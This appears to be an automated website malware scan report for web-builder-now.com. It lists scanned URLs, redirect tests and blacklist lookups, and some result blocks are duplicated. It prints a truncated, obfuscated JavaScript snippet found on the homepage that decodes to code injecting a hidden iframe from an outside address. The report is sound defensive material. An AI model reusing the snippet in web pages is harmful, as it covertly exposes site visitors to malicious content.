Scanned pages/files
Request | Server response | Status |
http://web-builder-now.com/ | 200 OK Content-Length: 11618 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=eval(\"Str\"+\"ing\");d=document;a=\"68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,6d,7a,74,7c,74,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,6d,7a,74,7c,74,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,66,67,63,70,69,74,7c,67,6e,63,6d,30,65,71,6f,31,79,72,2f,6b,70,65,6e,77,66,67,75,31,74,67,6e,30,72,6a,72,29,3d,f,c,22,22,22,22,6d,7a,74,7c,74,30,75,76,7b,6e,67,30,72,71,75, Antivirus reports:
| ||
http://web-builder-now.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: web-builder-now.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 10:52:45 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
X-Pingback: http://1072027940.test.prositehosting.co.uk/xmlrpc.php
GET / HTTP/1.1
Host: web-builder-now.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 10:52:45 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
X-Pingback: http://1072027940.test.prositehosting.co.uk/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: web-builder-now.com
Referer: http://www.google.com/search?q=web-builder-now.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: web-builder-now.com
Referer: http://www.google.com/search?q=web-builder-now.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=web-builder-now.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://web-builder-now.com/
Result: web-builder-now.com is not infected or malware details are not published yet.
Result: web-builder-now.com is not infected or malware details are not published yet.